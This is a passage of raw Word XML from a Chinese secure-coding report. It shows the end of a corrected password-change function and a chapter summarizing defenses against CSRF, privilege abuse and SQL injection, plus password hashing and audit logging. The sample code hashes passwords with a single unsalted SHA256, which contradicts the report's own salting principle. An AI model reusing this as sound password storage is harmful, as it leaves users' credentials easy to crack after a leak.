        <w:t xml:space="preserve">        return "请求来源不合法"</w:t>
        <w:br/>
        <w:t xml:space="preserve">    # ✅ 参数化查询 + SHA256</w:t>
        <w:br/>
        <w:t xml:space="preserve">    c.execute("UPDATE users SET password = ? WHERE username = ?",</w:t>
        <w:br/>
        <w:t xml:space="preserve">              (hashlib.sha256(new_password.encode()).hexdigest(), username))</w:t>
        <w:br/>
        <w:t xml:space="preserve">    conn.commit()</w:t>
        <w:br/>
        <w:t xml:space="preserve">    return redirect("/profile")</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t>第九章  安全编码规范总结</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>原则一：CSRF Token</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>所有涉及数据修改的POST请求必须包含CSRF Token，Token应为随机生成且绑定用户Session，每次提交后更新。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>原则二：同源验证</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>校验请求的Referer或Origin头，确保请求来自本站点，拒绝跨域请求。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>原则三：最小权限操作</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>用户只能修改自己的资源密码，不能越权操作他人数据。session中的username必须与提交的username一致。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>原则四：参数化查询</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>永远不要拼接SQL字符串，使用参数化查询（?占位符）防止SQL注入。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>原则五：密码安全存储</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>密码不应明文存储，应使用SHA256或bcrypt等哈希算法加盐存储，即使数据库泄露也无法还原密码。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>原则六：审计日志</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>所有敏感操作（登录、改密、删除用户）必须记录日志，包含用户名、时间、IP、操作内容，支持安全溯源。</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p>
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="999999"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>—— 报告结束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